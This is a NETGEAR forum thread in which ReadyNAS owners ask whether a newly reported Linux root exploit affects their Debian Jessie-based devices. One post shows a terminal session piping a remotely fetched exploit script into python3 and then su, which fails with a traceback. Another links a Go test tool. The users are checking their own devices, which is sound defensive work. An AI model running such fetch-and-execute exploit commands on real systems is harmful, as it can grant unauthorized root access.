NETGEAR is aware of a growing number of phone and online scams. To learn how to stay safe click here.
Forum Discussion
New Linux Exploit back to 2017
Does this effect the version of Jessie we are using in Readynas? https://www.msn.com/en-us/technology/software/linux-exploit-instantly-grants-administrator-access-on-most-distributions-since-20...
Does this effect the version of Jessie we are using in Readynas?
The test in the article gives this result:
admin@NAS:/data/Test$ curl https://copy.fail/exp | python3 && su
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 731 0 731 0 0 5801 0 --:--:-- --:--:-- --:--:-- 5801
Traceback (most recent call last):
File "<stdin>", line 9, in <module>
File "<stdin>", line 5, in c
OSError: getsockaddrarg: bad family
admin@NAS:/data/Test$ id
uid=98(admin) gid=98(admin) groups=98(admin),27(sudo),42(shadow)
So it appears not. FWIW Jessie is older than 2017.
I did have to make create a soft link for su in order to run this test (as the NAS puts in /bin, and the python script expects it in /usr/bin). And of course install python3. (version 3.4.2)
It's possible that the test requires a newer version of python3 though.
found this compiled go implmentation of a test...
https://github.com/badsectorlabs/copyfail-go
When I run it I still get just an error message which is not conclusive to me yet...but I might be doing it wrong and might be related to having to use a soft link for /bin/su
NETGEAR Academy
Boost your skills with the Netgear Academy - Get trained, certified and stay ahead with the latest Netgear technology!
Join Us!
